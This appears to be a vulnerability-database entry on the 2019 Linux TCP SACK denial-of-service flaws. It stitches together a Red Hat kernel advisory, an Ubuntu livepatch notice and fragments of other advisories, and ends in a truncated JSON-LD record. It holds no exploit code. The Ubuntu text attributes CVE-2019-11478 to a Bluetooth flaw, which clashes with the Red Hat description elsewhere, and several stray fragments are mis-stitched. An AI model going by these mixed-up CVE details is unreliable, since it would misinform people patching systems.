Jonathan Looney discovered that the TCP retransmission queue implementation in tcp_fragment in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit f070ef2ac66716357066b683fb0baf55f8191a2e. Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels. Linux Kernel Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a denial-of-service vulnerability. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2019:1488-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:1488 Issue date: 2019-06-17 CVE Names: CVE-2019-3896 CVE-2019-11477 CVE-2019-11478 CVE-2019-11479 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

  1. While processing SACK segments, the Linux kernel's socket buffer (SKB) data structure becomes fragmented. Each fragment is about TCP maximum segment size (MSS) bytes. To efficiently process SACK blocks, the Linux kernel merges multiple fragmented SKBs into one, potentially overflowing the variable holding the number of segments. A remote attacker could use this flaw to crash the Linux kernel by sending a crafted sequence of SACK segments on a TCP connection with small value of TCP MSS, resulting in a denial of service (DoS). (CVE-2019-11477)

  2. kernel: Double free in lib/idr.c (CVE-2019-3896)

  3. Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service (CVE-2019-11478)

  4. Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service (CVE-2019-11479)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • MDS mitigations not enabled on Intel Skylake CPUs (BZ#1710081)

  • RHEL6 kernel does not disable SMT with mds=full,nosmt (BZ#1710121)

  • [RHEL6] md_clear flag missing from /proc/cpuinfo (BZ#1710517)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1694812 - CVE-2019-3896 kernel: Double free in lib/idr.c 1719123 - CVE-2019-11477 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service 1719128 - CVE-2019-11478 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service 1719129 - CVE-2019-11479 Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

i386: kernel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-devel-2.6.32-754.15.3.el6.i686.rpm kernel-headers-2.6.32-754.15.3.el6.i686.rpm perf-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

i386: kernel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-devel-2.6.32-754.15.3.el6.i686.rpm kernel-headers-2.6.32-754.15.3.el6.i686.rpm perf-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

ppc64: kernel-2.6.32-754.15.3.el6.ppc64.rpm kernel-bootwrapper-2.6.32-754.15.3.el6.ppc64.rpm kernel-debug-2.6.32-754.15.3.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm kernel-devel-2.6.32-754.15.3.el6.ppc64.rpm kernel-headers-2.6.32-754.15.3.el6.ppc64.rpm perf-2.6.32-754.15.3.el6.ppc64.rpm perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm

s390x: kernel-2.6.32-754.15.3.el6.s390x.rpm kernel-debug-2.6.32-754.15.3.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debug-devel-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm kernel-devel-2.6.32-754.15.3.el6.s390x.rpm kernel-headers-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-devel-2.6.32-754.15.3.el6.s390x.rpm perf-2.6.32-754.15.3.el6.s390x.rpm perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm python-perf-2.6.32-754.15.3.el6.ppc64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm python-perf-2.6.32-754.15.3.el6.s390x.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-754.15.3.el6.src.rpm

i386: kernel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-devel-2.6.32-754.15.3.el6.i686.rpm kernel-headers-2.6.32-754.15.3.el6.i686.rpm perf-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm kernel-doc-2.6.32-754.15.3.el6.noarch.rpm kernel-firmware-2.6.32-754.15.3.el6.noarch.rpm

x86_64: kernel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm kernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm kernel-devel-2.6.32-754.15.3.el6.x86_64.rpm kernel-headers-2.6.32-754.15.3.el6.x86_64.rpm perf-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm python-perf-2.6.32-754.15.3.el6.i686.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm python-perf-2.6.32-754.15.3.el6.x86_64.rpm python-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-3896 https://access.redhat.com/security/cve/CVE-2019-11477 https://access.redhat.com/security/cve/CVE-2019-11478 https://access.redhat.com/security/cve/CVE-2019-11479 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/tcpsack

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXQfbBdzjgjWX9erEAQjjiw//QtCd50n/kyijAWgyi02UAPD+QrPWRv6a gLSESiQGCl7YvWgt96eI5DANREmFMWQ8wB0LRku4KJ4tutBdTcyouWrHgHEYhXLB 24ZBi8HB/L9EhxKoQlHlY68ekZzbOcjqZhrL5K2xUnoVTJDo/+d+vtJgOIlrV/PC aXxRL5nez5Y8pjCiwqm37RP7OUnn6daLtqcu42DR9XovXqORrfJVo43+5HR0drLA ZB2B0ERUU+iFKpS6p9qIgfMLR9KRlMikeI+NRU/1JBjEDT5C4uT4fqULjM4a4QcR 4Cm+wN6ku7CTK8l+1RAKSAn12KMjHUfMhWT1X0XFTFl3lFifL6o6+5D0OVSM68xL k+E8pmoilN1nFk49Z9uLDbCJogLbPdgSOZohiuYLBfUE4IUy0OiCodmKRlQBxWTK tYBMbUQ1stywEGngsFAXnF7BIeC346+uvMT83TlfbhV+TNIFARjwx9ySNrV7hLes enTzE250yv7LaZ0tXGKhoPXfLif7nFFVNzupV1PM3uHDCjLYLRq5JQcd1IWCrBS0 IF5A/kp1X9zV8lO4fghj3aSXA7HwQphRBEJ4FkZSu34eqUX5rrC96X5T/8T9McOK iOKT/z03WI1mSBJUrU/x7N2v44mXr0kropqd/Yfqf6KQDJWW3aXkJJWxNMgBqiYS l+p3rcEBzDA=NzJu -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Kernel Live Patch Security Notice 0058-1 October 22, 2019

linux vulnerability

A security issue affects these releases of Ubuntu:

| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem | | Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |

Summary:

Several security issues were fixed in the kernel. (CVE-2016-10905)

It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. (CVE-2018-20856)

It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. (CVE-2018-20961)

It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. (CVE-2018-20976)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. (CVE-2018-21008)

It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). (CVE-2019-0136)

It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. (CVE-2019-2054)

It was discovered that an integer overflow existed in the Binder implementation of the Linux kernel, leading to a buffer overflow. (CVE-2019-2181)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. (CVE-2019-3846)

It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. (CVE-2019-10126)

It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. (CVE-2019-11478)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)

It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. (CVE-2019-12614)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. (CVE-2019-14284)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14814)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14815)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. (CVE-2019-14821)

Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)

Update instructions:

The problem can be corrected by updating your livepatches to the following versions:

| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 58.1 | lowlatency, generic | | 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-150.176 | 58.1 | generic, lowlatency | | 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-151.178 | 58.1 | lowlatency, generic | | 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-154.181 | 58.1 | lowlatency, generic | | 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-157.185 | 58.1 | lowlatency, generic | | 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-159.187 | 58.1 | lowlatency, generic | | 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-161.189 | 58.1 | lowlatency, generic | | 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-164.192 | 58.1 | lowlatency, generic | | 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-165.193 | 58.1 | generic, lowlatency | | 4.4.0-1083.93 | 58.1 | aws | | 4.4.0-1084.94 | 58.1 | aws | | 4.4.0-1085.96 | 58.1 | aws | | 4.4.0-1087.98 | 58.1 | aws | | 4.4.0-1088.99 | 58.1 | aws | | 4.4.0-1090.101 | 58.1 | aws | | 4.4.0-1092.103 | 58.1 | aws | | 4.4.0-1094.105 | 58.1 | aws | | 4.15.0-50.54 | 58.1 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-51.55 | 58.1 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-52.56 | 58.1 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-54.58 | 58.1 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-55.60 | 58.1 | generic, lowlatency | | 4.15.0-58.64 | 58.1 | generic, lowlatency | | 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-60.67 | 58.1 | lowlatency, generic | | 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-62.69 | 58.1 | generic, lowlatency | | 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-64.73 | 58.1 | generic, lowlatency | | 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-65.74 | 58.1 | lowlatency, generic | | 4.15.0-1038.43 | 58.1 | oem | | 4.15.0-1039.41 | 58.1 | aws | | 4.15.0-1039.44 | 58.1 | oem | | 4.15.0-1040.42 | 58.1 | aws | | 4.15.0-1041.43 | 58.1 | aws | | 4.15.0-1043.45 | 58.1 | aws | | 4.15.0-1043.48 | 58.1 | oem | | 4.15.0-1044.46 | 58.1 | aws | | 4.15.0-1045.47 | 58.1 | aws | | 4.15.0-1045.50 | 58.1 | oem | | 4.15.0-1047.49 | 58.1 | aws | | 4.15.0-1047.51 | 58.1 | azure | | 4.15.0-1048.50 | 58.1 | aws | | 4.15.0-1049.54 | 58.1 | azure | | 4.15.0-1050.52 | 58.1 | aws | | 4.15.0-1050.55 | 58.1 | azure | | 4.15.0-1050.57 | 58.1 | oem | | 4.15.0-1051.53 | 58.1 | aws | | 4.15.0-1051.56 | 58.1 | azure | | 4.15.0-1052.57 | 58.1 | azure | | 4.15.0-1055.60 | 58.1 | azure | | 4.15.0-1056.61 | 58.1 | azure | | 4.15.0-1056.65 | 58.1 | oem | | 4.15.0-1057.62 | 58.1 | azure | | 4.15.0-1057.66 | 58.1 | oem | | 4.15.0-1059.64 | 58.1 | azure | | 5.0.0-1014.14~18.04.1 | 58.1 | azure | | 5.0.0-1016.17~18.04.1 | 58.1 | azure | | 5.0.0-1018.19~18.04.1 | 58.1 | azure | | 5.0.0-1020.21~18.04.1 | 58.1 | azure |

Support Information:

Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.

| Series | Version | Flavors | |------------------+------------------+--------------------------| | Ubuntu 18.04 LTS | 4.15.0-1039 | aws | | Ubuntu 16.04 LTS | 4.4.0-1083 | aws | | Ubuntu 18.04 LTS | 5.0.0-1000 | azure | | Ubuntu 16.04 LTS | 4.15.0-1047 | azure | | Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency | | Ubuntu 18.04 LTS | 4.15.0-1038 | oem | | Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |

References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce . 7) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. 7.2) - noarch, x86_64

Bug Fix(es):

  • THP: Race between MADV_DONTNEED and NUMA hinting node migration code (BZ#1698103)

  • [RHEL7] md_clear flag missing from /proc/cpuinfo on late microcode update (BZ#1712989)

  • [RHEL7] MDS mitigations are not enabled after double microcode update (BZ#1712994)

  • WARNING: CPU: 0 PID: 0 at kernel/jump_label.c:90 __static_key_slow_dec+0xa6/0xb0 (BZ#1713000)

Bug Fix(es):

  • kernel-rt: update to the RHEL8.0.z batch#1 source tree (BZ#1704955)

  • These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

The following packages have been upgraded to a later upstream version: redhat-release-virtualization-host (4.3.4), redhat-virtualization-host (4.3.4)

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
